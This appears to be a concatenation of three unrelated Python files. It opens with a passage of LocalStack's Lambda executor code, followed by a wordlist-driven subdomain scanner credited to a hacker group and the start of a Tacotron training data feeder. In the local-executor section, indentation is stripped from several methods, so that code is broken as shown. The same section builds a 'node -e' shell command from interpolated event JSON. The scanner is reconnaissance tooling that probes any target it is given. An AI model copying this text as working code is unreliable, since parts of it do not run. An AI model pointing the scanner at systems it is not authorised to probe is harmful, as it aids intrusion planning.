                LOG.debug("Creating container: %s" % container_name)
                self.create_container(func_details, env_vars, lambda_cwd, docker_flags)

                if config.LAMBDA_REMOTE_DOCKER:
                    LOG.debug(
                        'Copying files to container "%s" from "%s".' % (container_name, lambda_cwd)
                    )
                    DOCKER_CLIENT.copy_into_container(
                        container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
                    )

                LOG.debug("Starting docker-reuse Lambda container: %s", container_name)
                DOCKER_CLIENT.start_container(container_name)

                # give the container some time to start up
                time.sleep(1)

            container_network = self.get_docker_container_network(func_arn)
            entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)

            LOG.debug(
                'Using entrypoint "%s" for container "%s" on network "%s".'
                % (entry_point, container_name, container_network)
            )

            return ContainerInfo(container_name, entry_point)

    def create_container(self, func_details, env_vars, lambda_cwd, docker_flags=None):
        """Create (but do not start) the re-usable container for the given function."""
        docker_image = Util.docker_image_for_lambda(func_details)
        container_name = self.get_container_name(func_details.arn())

        # make sure we set LOCALSTACK_HOSTNAME
        Util.inject_endpoints_into_env(env_vars)

        # make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
        env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)

        network = config.LAMBDA_DOCKER_NETWORK
        additional_flags = docker_flags
        dns = config.LAMBDA_DOCKER_DNS

        mount_volumes = not config.LAMBDA_REMOTE_DOCKER
        lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
        if ":" in lambda_cwd and "\\" in lambda_cwd:
            lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
        mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None

        if os.environ.get("HOSTNAME"):
            env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
        # fix: env var values must be strings - other EDGE_PORT assignments in this
        # module use str(config.EDGE_PORT) as well
        env_vars["EDGE_PORT"] = str(config.EDGE_PORT)

        LOG.debug(
            "Creating docker-reuse Lambda container %s from image %s", container_name, docker_image
        )
        return DOCKER_CLIENT.create_container(
            image_name=docker_image,
            remove=True,
            interactive=True,
            name=container_name,
            entrypoint="/bin/bash",
            network=network,
            env_vars=env_vars,
            dns=dns,
            mount_volumes=mount_volumes,
            additional_flags=additional_flags,
        )

    def destroy_docker_container(self, func_arn):
        """
        Stops and/or removes a docker container for a specific lambda function ARN.
        :param func_arn: The ARN of the lambda function.
        :return: None
        """
        with self.docker_container_lock:
            status = self.get_docker_container_status(func_arn)

            # Get the container name and id.
            container_name = self.get_container_name(func_arn)
            if status == 1:
                LOG.debug("Stopping container: %s" % container_name)
                DOCKER_CLIENT.stop_container(container_name)
                status = self.get_docker_container_status(func_arn)

            if status == -1:
                LOG.debug("Removing container: %s" % container_name)
                rm_docker_container(container_name, safe=True)

            # clean up function invoke times, as some init logic depends on this
            self.function_invoke_times.pop(func_arn, None)

    def get_all_container_names(self):
        """
        Returns a list of container names for lambda containers.
        :return: A String[] localstack docker container names for each function.
        """
        with self.docker_container_lock:
            LOG.debug("Getting all lambda containers names.")
            list_result = DOCKER_CLIENT.list_containers(filter="name=localstack_lambda_*")
            container_names = list(map(lambda container: container["name"], list_result))
            return container_names

    def destroy_existing_docker_containers(self):
        """
        Stops and/or removes all lambda docker containers for localstack.
        :return: None
        """
        with self.docker_container_lock:
            container_names = self.get_all_container_names()
            LOG.debug("Removing %d containers." % len(container_names))
            for container_name in container_names:
                DOCKER_CLIENT.remove_container(container_name)

    def get_docker_container_status(self, func_arn):
        """
        Determine the status of a docker container.
        :param func_arn: The ARN of the lambda function.
        :return: 1 If the container is running,
        -1 if the container exists but is not running
        0 if the container does not exist.
        """
        with self.docker_container_lock:
            # Get the container name and id.
            container_name = self.get_container_name(func_arn)
            container_status = DOCKER_CLIENT.get_container_status(container_name)
            return container_status.value

    def get_docker_container_network(self, func_arn):
        """
        Determine the network of a docker container.
        :param func_arn: The ARN of the lambda function.
        :return: name of the container network
        """
        with self.docker_container_lock:
            status = self.get_docker_container_status(func_arn)
            # container does not exist
            if status == 0:
                return ""

            # Get the container name.
            container_name = self.get_container_name(func_arn)
            container_network = DOCKER_CLIENT.get_network(container_name)
            return container_network

    def idle_container_destroyer(self):
        """
        Iterates though all the lambda containers and destroys any container that has
        been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
        :return: None
        """
        LOG.debug("Checking if there are idle containers ...")
        current_time = int(time.time() * 1000)
        for func_arn, last_run_time in dict(self.function_invoke_times).items():
            duration = current_time - last_run_time

            # not enough idle time has passed
            if duration < MAX_CONTAINER_IDLE_TIME_MS:
                continue

            # container has been idle, destroy it.
            self.destroy_docker_container(func_arn)

    def start_idle_container_destroyer_interval(self):
        """
        Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
        Thus checking for idle containers and destroying them.
        :return: None
        """
        self.idle_container_destroyer()
        threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()

    def get_container_name(self, func_arn):
        """
        Given a function ARN, returns a valid docker container name.
        :param func_arn: The ARN of the lambda function.
        :return: A docker compatible name for the arn.
        """
        return "localstack_lambda_" + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
    """Executor class that runs each Lambda invocation in a fresh, short-lived Docker container."""

    def __init__(self):
        super(LambdaExecutorSeparateContainers, self).__init__()
        self.max_port = LAMBDA_API_UNIQUE_PORTS
        self.port_offset = LAMBDA_API_PORT_OFFSET

    def prepare_event(self, environment: Dict, event_body: str) -> bytes:
        """Return the event as stdin bytes; the container reads the payload from stdin."""
        # Tell Lambci to use STDIN for the event
        environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
        return event_body.encode()

    def execute_in_container(
        self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
    ) -> Tuple[bytes, bytes]:
        """Create and run a one-off container for this invocation; return (stdout, stderr)."""
        lambda_cwd = func_details.cwd
        handler = func_details.handler

        # an explicit command overrides the image entrypoint; otherwise the handler is the command
        entrypoint = None
        if command:
            entrypoint = ""
        elif handler:
            command = handler
        else:
            command = None

        # add Docker Lambda env vars
        network = config.LAMBDA_DOCKER_NETWORK or None
        if network == "host":
            # fix: env var values must be strings, like all other env vars set in this module
            port = str(get_free_tcp_port())
            env_vars["DOCKER_LAMBDA_API_PORT"] = port
            env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port

        additional_flags = docker_flags or ""
        dns = config.LAMBDA_DOCKER_DNS
        docker_java_ports = PortMappings()
        if Util.debug_java_port:
            docker_java_ports.add(Util.debug_java_port)
        docker_image = Util.docker_image_for_lambda(func_details)

        if config.LAMBDA_REMOTE_DOCKER:
            # for remote Docker, the code is copied into the container before starting it
            container_id = DOCKER_CLIENT.create_container(
                image_name=docker_image,
                interactive=True,
                entrypoint=entrypoint,
                remove=True,
                network=network,
                env_vars=env_vars,
                dns=dns,
                additional_flags=additional_flags,
                ports=docker_java_ports,
                command=command,
            )
            DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
            return DOCKER_CLIENT.start_container(
                container_id, interactive=not background, attach=not background, stdin=stdin
            )
        else:
            # for local Docker, the code folder is bind-mounted into the container
            mount_volumes = None
            if lambda_cwd:
                mount_volumes = [
                    (Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
                ]
            return DOCKER_CLIENT.run_container(
                image_name=docker_image,
                interactive=True,
                detach=background,
                entrypoint=entrypoint,
                remove=True,
                network=network,
                env_vars=env_vars,
                dns=dns,
                additional_flags=additional_flags,
                command=command,
                mount_volumes=mount_volumes,
                stdin=stdin,
            )
class LambdaExecutorLocal(LambdaExecutor):
def _execute_in_custom_runtime(self, cmd: str, func_details=None) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param func_details: function details
:return: the InvocationResult
"""
env_vars = func_details and func_details.envvars
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True, "env_vars": env_vars}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = func_details and func_details.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, func_arn, func_details, event, context=None, version=None
) -> InvocationResult:
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
if func_details.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(func_details.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_FUNCTION_MEMORY_SIZE"] = str(context.memory_limit_in_mb)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
# set default env variables required for most Lambda handlers
self.set_default_env_variables()
# run the actual handler function
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
func_arn,
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s'
% (func_arn, error, "".join(traceback.format_tb(error.__traceback__)))
)
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
# This is a no-op for local executors - simply return the given local file path
return local_file
def execute_java_lambda(self, event, context, main_file, func_details=None):
func_details.envvars = func_details.envvars or {}
java_opts = config.LAMBDA_JAVA_OPTS or ""
handler = func_details.handler
func_details.envvars[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s" % (
java_opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
event_file,
)
# apply plugin patches
inv_context = InvocationContext(
func_details, event, environment=func_details.envvars, lambda_command=cmd
)
self.apply_plugin_patches(inv_context)
cmd = inv_context.lambda_command
LOG.info(cmd)
# execute Lambda and get invocation result
invocation_result = self._execute_in_custom_runtime(cmd, func_details=func_details)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def execute_javascript_lambda(self, event, context, main_file, func_details=None):
    """Execute a Node.js Lambda locally via a one-shot `node -e` invocation.

    The exported handler function is awaited and its JSON-serialized result
    is written to stdout by the generated snippet.
    """
    # Handler is "<module>.<export>"; we only need the exported function name here.
    export_name = func_details.handler.split(".")[-1]
    event_json = json.dumps(json_safe(event)) if event else "{}"
    context_json = json.dumps(context.__dict__) if context else "{}"
    cmd = (
        "node -e 'require(\"%s\").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'"
        % (
            main_file,
            export_name,
            event_json,
            context_json,
        )
    )
    LOG.info(cmd)
    return self._execute_in_custom_runtime(cmd, func_details=func_details)
@staticmethod
def set_default_env_variables():
    """Ensure env variables required by most Lambda handlers are set.

    Only variables that are currently unset (or empty) are written.
    :return: mapping of each default var name to its previous value, suitable
             for passing to `reset_default_env_variables`.
    """
    defaults = {"AWS_DEFAULT_REGION": aws_stack.get_region()}
    previous = {name: os.environ.get(name) for name in defaults}
    for name, value in defaults.items():
        # don't clobber values the user already configured
        if not previous.get(name):
            os.environ[name] = value
    return previous
@staticmethod
def reset_default_env_variables(env_vars_before):
for env_name, env_value in env_vars_before.items():
env_value_before = env_vars_before.get(env_name)
os.environ[env_name] = env_value_before or ""
if env_value_before is None:
os.environ.pop(env_name, None)
def execute_go_lambda(self, event, context, main_file, func_details=None):
    """Execute a Go Lambda locally via the configured Go runtime command.

    Handler path and serialized event are handed over through env variables.
    """
    if not func_details:
        LOG.warning("Unable to get function details for local execution of Golang Lambda")
    else:
        func_details.envvars["AWS_LAMBDA_FUNCTION_HANDLER"] = main_file
        func_details.envvars["AWS_LAMBDA_EVENT_BODY"] = json.dumps(json_safe(event))
    cmd = GO_LAMBDA_RUNTIME
    LOG.info(cmd)
    return self._execute_in_custom_runtime(cmd, func_details=func_details)
class Util:
    """Static helpers for building commands, paths and Docker images for Lambda execution."""

    # Cached Java debug port; False means "not resolved yet" (set on first use below).
    debug_java_port = False

    @classmethod
    def get_java_opts(cls):
        """Return JVM options from config, resolving the `_debug_port_` placeholder.

        On first use, `_debug_port_` is replaced with a free TCP port which is
        cached on the class; if the opts already contain an explicit
        `address=[host:]port`, that port is cached instead.
        """
        opts = config.LAMBDA_JAVA_OPTS or ""
        # Replace _debug_port_ with a random free port
        if "_debug_port_" in opts:
            if not cls.debug_java_port:
                cls.debug_java_port = get_free_tcp_port()
            opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
        else:
            # Parse the debug port from opts (e.g. JDWP "address=<host:>port")
            m = re.match(".*address=(.+:)?(\\d+).*", opts)
            if m is not None:
                cls.debug_java_port = m.groups()[1]
        return opts

    @classmethod
    def get_host_path_for_path_in_docker(cls, path):
        """Map a path under config.TMP_FOLDER to the equivalent path under HOST_TMP_FOLDER."""
        return re.sub(r"^%s/(.*)$" % config.TMP_FOLDER, r"%s/\1" % config.HOST_TMP_FOLDER, path)

    @classmethod
    def format_windows_path(cls, path):
        """Normalize a Windows path into a Docker-mountable POSIX-style path.

        Drops the drive colon, flips backslashes, ensures a leading slash and
        prepends config.WINDOWS_DOCKER_MOUNT_PREFIX.
        """
        temp = path.replace(":", "").replace("\\", "/")
        if len(temp) >= 1 and temp[:1] != "/":
            temp = "/" + temp
        temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
        return temp

    @classmethod
    def docker_image_for_lambda(cls, func_details):
        """Return the Docker image name:tag used to execute the given function's runtime."""
        runtime = func_details.runtime or ""
        if func_details.code.get("ImageUri"):
            LOG.warning(
                "ImageUri is set: Using Lambda container images is only supported in LocalStack Pro"
            )
        docker_tag = runtime
        docker_image = config.LAMBDA_CONTAINER_REGISTRY
        # TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
        # See https://github.com/lambci/docker-lambda/pull/218
        lambdas_to_add_prefix = [
            "dotnetcore2.0",
            "dotnetcore2.1",
            "python3.6",
            "python3.7",
        ]
        if docker_image == "lambci/lambda" and any(
            img in docker_tag for img in lambdas_to_add_prefix
        ):
            docker_tag = "20191117-%s" % docker_tag
        if runtime == "nodejs14.x":
            # TODO temporary fix until lambci image for nodejs14.x becomes available
            docker_image = "localstack/lambda-js"
        return "%s:%s" % (docker_image, docker_tag)

    @classmethod
    def get_java_classpath(cls, archive):
        """
        Return the Java classpath, using the parent folder of the
        given archive as the base folder.
        The result contains any *.jar files in the base folder, as
        well as any JAR files in the "lib/*" subfolder living
        alongside the supplied java archive (.jar or .zip).
        :param archive: an absolute path to a .jar or .zip Java archive
        :return: the Java classpath, relative to the base dir of "archive"
        """
        entries = ["."]
        base_dir = os.path.dirname(archive)
        for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
            for entry in glob.glob(pattern % base_dir):
                # skip the archive itself; it is appended last (see below)
                if os.path.realpath(archive) != os.path.realpath(entry):
                    entries.append(os.path.relpath(entry, base_dir))
        # make sure to append the localstack-utils.jar at the end of the classpath
        # https://github.com/localstack/localstack/issues/1160
        entries.append(os.path.relpath(archive, base_dir))
        entries.append("*.jar")
        entries.append("java/lib/*.jar")
        result = ":".join(entries)
        return result

    @staticmethod
    def mountable_tmp_file():
        """Create a path for a temp file under TMP_FOLDER and register it for cleanup."""
        f = os.path.join(config.TMP_FOLDER, short_uid())
        TMP_FILES.append(f)
        return f

    @staticmethod
    def inject_endpoints_into_env(env_vars: Dict[str, str]):
        """Add LocalStack endpoint variables to `env_vars` (without overwriting existing values)."""
        env_vars = env_vars or {}
        main_endpoint = get_main_endpoint_from_container()
        if not env_vars.get("LOCALSTACK_HOSTNAME"):
            env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
        if not env_vars.get("AWS_ENDPOINT_URL"):
            # Note that $AWS_ENDPOINT_URL is currently not (yet) supported by AWS, but we
            # can use it to ship patched Lambda runtimes that can interpret this config.
            env_vars["AWS_ENDPOINT_URL"] = config.get_edge_url(
                localstack_hostname=main_endpoint, protocol="http"
            )
        return env_vars
# --------------
# GLOBAL STATE
# --------------

# Singleton executor instances, created once at import time.
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
    "local": EXECUTOR_LOCAL,
    "docker": EXECUTOR_CONTAINERS_SEPARATE,
    "docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
|
subdomain.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script Created By:
Cr4sHCoD3
Copyrights:
Cr4sHCoD3 2018
Special Mentions:
PureHackers PH
Blood Security Hackers
"""
import os
import sys
import platform
import time
import datetime
import argparse
import socket
from threading import Thread
# Dependency checks: show an install hint and bail out if a required
# third-party module is missing.
try:
    import requests
    from requests.exceptions import ConnectionError
except ImportError:
    # Fix: was a bare `except:`, which also swallows SystemExit/KeyboardInterrupt;
    # only a missing module should trigger the install hint. The four-way
    # platform check collapsed to one expression (every non-Windows OS used 'clear').
    os.system('cls' if platform.system() == 'Windows' else 'clear')
    print ("""
 o-o o o o-o
 | | | o |
o-o o o O-o o-O o-o o-O-o oo o-o o-o o-o oo o-o o-o o-o o-o
| | | | | | | | | | | | | | | | | | | | | | | | | |-' |
o--o o--o o-o o-o o-o o o o o-o-| o o o--o o-o o-o-o o o o o-o o
Created By: Cr4sHCoD3 [ PureHackers | Blood Security Hackers ]
Github: https://github.com/cr4shcod3
""")
    print ('[!] - Module (requests) not installed!')
    sys.exit()
try:
    import whois
except ImportError:
    os.system('cls' if platform.system() == 'Windows' else 'clear')
    print ("""
 o-o o o o-o
 | | | o |
o-o o o O-o o-O o-o o-O-o oo o-o o-o o-o oo o-o o-o o-o o-o
| | | | | | | | | | | | | | | | | | | | | | | | | |-' |
o--o o--o o-o o-o o-o o o o o-o-| o o o--o o-o o-o-o o o o o-o o
Created By: Cr4sHCoD3 [ PureHackers | Blood Security Hackers ]
Github: https://github.com/cr4shcod3
""")
    print ('[!] - Module (python-whois) not installed!\n[!] - Module (future) not installed!')
    sys.exit()
# GLOBAL
# Result buckets, filled by subdomain_scan(): reachable URLs, one list per
# interesting HTTP status code, and everything else.
urls = []
valid = []
rc_400 = []
rc_401 = []
rc_403 = []
rc_404 = []
rc_500 = []
rc_502 = []
rc_503 = []
rc_504 = []
invalid = []

# Fix: the old %w-based elif chain misspelled Tuesday ("Tuesay") and compared
# strftime()'s string result against both ints and strings. strftime("%A")
# yields the weekday name directly.
_today = datetime.date.today()
month = _today.strftime("%B")
day = _today.strftime("%A")
mday = _today.strftime("%d")
year = _today.strftime("%Y")
current_datetime = datetime.datetime.now()
current_time = current_datetime.strftime('%I:%M:%S')
def clear():
    """Clear the terminal using the platform-appropriate shell command."""
    # Windows needs "cls"; Linux, Darwin and everything else use "clear".
    command = 'cls' if platform.system() == 'Windows' else 'clear'
    os.system(command)
def banner():
    """Print the ASCII-art program banner with author credits."""
    print ("""
 o-o o o o-o
 | | | o |
o-o o o O-o o-O o-o o-O-o oo o-o o-o o-o oo o-o o-o o-o o-o
| | | | | | | | | | | | | | | | | | | | | | | | | |-' |
o--o o--o o-o o-o o-o o o o o-o-| o o o--o o-o o-o-o o o o o-o o
Created By: Cr4sHCoD3 [ PureHackers | Blood Security Hackers ]
Github: https://github.com/cr4shcod3
""")
def generate_urls():
    """Build one candidate URL per wordlist entry into the global `urls` list."""
    # `list` (the wordlist) and `hostname` are module-level globals set in __main__.
    for word in list:
        urls.append('http://' + word + '.' + hostname)
def subdomain_scan(s_url):
    """Request `s_url` and append it to the global bucket matching its HTTP status.

    200 goes to `valid`, the tracked error codes to their rc_* lists, anything
    else (including connection failures) to `invalid`.
    """
    buckets = {
        200: valid,
        400: rc_400,
        401: rc_401,
        403: rc_403,
        404: rc_404,
        500: rc_500,
        502: rc_502,
        503: rc_503,
        504: rc_504,
    }
    try:
        response = requests.get(s_url)
    except ConnectionError:
        invalid.append(s_url)
        return
    buckets.get(response.status_code, invalid).append(s_url)
def create_output():
    """Append a dated report (valid subdomains + per-status-code URLs) to output_file.

    Relies on module globals set in __main__/scanning: output_file, url, day,
    month, mday, year, current_time and the result buckets.
    """
    output_file.write('{0}: {1} {2}, {3} = {4}\n'.format(day, month, mday, year, current_time))
    output_file.write('URL: {0}\n'.format(url))
    output_file.write('Subdomains:\n')
    for ii, i in enumerate(valid, 1):
        output_file.write(' ' + str(ii) + '. {0}\n'.format(i))
    output_file.write('Response Code:\n')
    # Fix: eight copy-pasted numbering loops collapsed into one data-driven loop;
    # output bytes are unchanged.
    sections = ((400, rc_400), (401, rc_401), (403, rc_403), (404, rc_404),
                (500, rc_500), (502, rc_502), (503, rc_503), (504, rc_504))
    for code, bucket in sections:
        output_file.write(' {0}:\n'.format(code))
        for ii, i in enumerate(bucket, 1):
            output_file.write(' ' + str(ii) + '. {0}\n'.format(i))
    output_file.write('\n\n')
def main():
    """Scan all generated subdomain URLs, print categorized results, write the report."""
    generate_urls()
    print ("""
[ Configuration ]
URL = {0}
Wordlist = {1}
Subdomains = {2}
Output = {3}
""".format(url, l_file, len(list), output))
    threads = []
    try:
        for scan_url in urls:
            t = Thread(target=subdomain_scan, args=(scan_url,))
            t.start()
            threads.append(t)
        # Fix: only the most recently created thread used to be joined, so
        # results could be printed while most scans were still in flight.
        for t in threads:
            t.join()
    except (EOFError, KeyboardInterrupt):
        print ('\n[+] - Exiting.')
        sys.exit()
    print ("[ Subdomain Scanner ]")

    def _report(label, bucket):
        """Print one `<label><url> ( <country> - <ip> )` line per URL in bucket."""
        for entry in bucket:
            hname = entry.replace('http://', '')
            try:
                country = whois.whois(hname).country
            except Exception:
                country = '?'
            try:
                ip = socket.gethostbyname(hname)
            except socket.error:
                # Fix: an unresolvable host used to raise and abort the whole report.
                ip = '?'
            print (label + entry + ' ( ' + str(country) + ' - ' + ip + ') ')

    # Fix: nine copy-pasted loops collapsed into one helper call per bucket.
    _report('[+] 200 - ', valid)
    _report('[#] 400 - ', rc_400)
    _report('[#] 401 - ', rc_401)
    _report('[#] 403 - ', rc_403)
    _report('[#] 404 - ', rc_404)
    _report('[#] 500 - ', rc_500)
    _report('[#] 502 - ', rc_502)
    _report('[#] 503 - ', rc_503)
    _report('[#] 504 - ', rc_504)
    print ("""
[ Result ]
Valid = {0}
Invalid = {1}
Response Codes:
400 = {2}
401 = {3}
403 = {4}
404 = {5}
500 = {6}
502 = {7}
503 = {8}
504 = {9}
""".format(len(valid), len(invalid), len(rc_400), len(rc_401), len(rc_403), len(rc_404), len(rc_500), len(rc_502), len(rc_503), len(rc_504)))
    create_output()
if __name__ == '__main__':
    clear()
    banner()
    parser = argparse.ArgumentParser(description='Python Subdomain Scanner Created By: Cr4sHCoD3')
    parser.add_argument('-u',
                        '--url',
                        metavar='URL',
                        action='store',
                        help='"Set the target URL." [http://example.com]',
                        type=str)
    parser.add_argument('-l',
                        '--list',
                        choices=['default', '100', '500', '1000', '10000', 'uk-500', 'uk-1000'],
                        default='default',
                        metavar='NUM',
                        action='store',
                        help='"Set the wordlist to be used." [100] / [500] / [1000] / [10000] / [uk-500] / [uk-1000] / [default]')
    parser.add_argument('-cl',
                        '--custom-list',
                        metavar='FILE',
                        default='wordlist/s.txt',
                        action='store',
                        help='"Set the wordlist in your own custom wordlist." [Filename.txt]')
    output = 'subdomains_output.txt'
    parser.add_argument('-o',
                        '--output',
                        default=output,
                        metavar='FILE',
                        action='store',
                        help='"Set the output file." [output.txt]')
    args = parser.parse_args()

    # Target URL: from -u, otherwise prompt (raw_input -> this is a Python 2 script).
    url = args.url if args.url is not None else raw_input('URL: ')
    url = url.replace('www.', '')
    hostname = url.replace('http://', '')

    # Fix: seven copy-pasted open/read elif arms collapsed into a lookup table;
    # argparse `choices` guarantees args.list is one of these keys.
    wordlist_files = {
        'default': 'wordlist/s.txt',
        '100': 'wordlist/s-100.txt',
        '500': 'wordlist/s-500.txt',
        '1000': 'wordlist/s-1000.txt',
        '10000': 'wordlist/s-10000.txt',
        'uk-500': 'wordlist/suk-500.txt',
        'uk-1000': 'wordlist/suk-1000.txt',
    }
    l_file = wordlist_files[args.list]
    if args.list == 'default' and args.custom_list is not None:
        # -cl overrides the default wordlist (its own default is wordlist/s.txt).
        l_file = args.custom_list
    list_file = open(l_file, 'r')
    # NOTE: keeps the global name `list` (shadowing the builtin) because
    # generate_urls() and main() read it.
    list = list_file.read().splitlines()
    list_file.close()  # Fix: the wordlist file handle was never closed

    if args.output != output and '.txt' not in args.output:
        args.output = args.output + '.txt'
    output_file = open(args.output, 'a+')
    main()
|
feeder.py | from sklearn.model_selection import train_test_split
from synthesizer.utils.text import text_to_sequence
from synthesizer.infolog import log
import tensorflow as tf
import numpy as np
import threading
import time
import os
# Number of batches the producer thread prepares per group (see _enqueue_next_train_group).
_batches_per_group = 64
class Feeder:
    """
    Feeds batches of data into queue on a background thread.

    Builds TF1 placeholders plus a train FIFOQueue and an eval FIFOQueue; two
    daemon threads (see start_threads) keep them filled from the metadata file.
    """

    def __init__(self, coordinator, metadata_filename, hparams):
        """
        :param coordinator: object whose should_stop() controls the producer loops
        :param metadata_filename: path to the "|"-separated training metadata file;
            "mels"/"embeds" sibling dirs hold the target arrays
        :param hparams: hyperparameter object (batch size, test split, padding, ...)
        """
        super(Feeder, self).__init__()
        self._coord = coordinator
        self._hparams = hparams
        self._cleaner_names = [x.strip() for x in hparams.cleaners.split(",")]
        self._train_offset = 0
        self._test_offset = 0

        # Load metadata
        self._mel_dir = os.path.join(os.path.dirname(metadata_filename), "mels")
        self._embed_dir = os.path.join(os.path.dirname(metadata_filename), "embeds")
        with open(metadata_filename, encoding="utf-8") as f:
            self._metadata = [line.strip().split("|") for line in f]
            # metadata column 4 holds the frame count; convert frames -> hours
            frame_shift_ms = hparams.hop_size / hparams.sample_rate
            hours = sum([int(x[4]) for x in self._metadata]) * frame_shift_ms / (3600)
            log("Loaded metadata for {} examples ({:.2f} hours)".format(len(self._metadata), hours))

        # Train test split
        if hparams.tacotron_test_size is None:
            assert hparams.tacotron_test_batches is not None

        test_size = (hparams.tacotron_test_size if hparams.tacotron_test_size is not None
                     else hparams.tacotron_test_batches * hparams.tacotron_batch_size)
        indices = np.arange(len(self._metadata))
        train_indices, test_indices = train_test_split(indices,
                                                       test_size=test_size,
                                                       random_state=hparams.tacotron_data_random_state)

        # Make sure test_indices is a multiple of batch_size else round up
        len_test_indices = self._round_down(len(test_indices), hparams.tacotron_batch_size)
        extra_test = test_indices[len_test_indices:]
        test_indices = test_indices[:len_test_indices]
        # leftover test examples are moved back into the training set
        train_indices = np.concatenate([train_indices, extra_test])

        self._train_meta = list(np.array(self._metadata)[train_indices])
        self._test_meta = list(np.array(self._metadata)[test_indices])

        self.test_steps = len(self._test_meta) // hparams.tacotron_batch_size

        if hparams.tacotron_test_size is None:
            assert hparams.tacotron_test_batches == self.test_steps

        # pad input sequences with the <pad_token> 0 ( _ )
        self._pad = 0
        # explicitly setting the padding to a value that doesn't originally exist in the spectrogram
        # to avoid any possible conflicts, without affecting the output range of the model too much
        if hparams.symmetric_mels:
            self._target_pad = -hparams.max_abs_value
        else:
            self._target_pad = 0.
        # Mark finished sequences with 1s
        self._token_pad = 1.

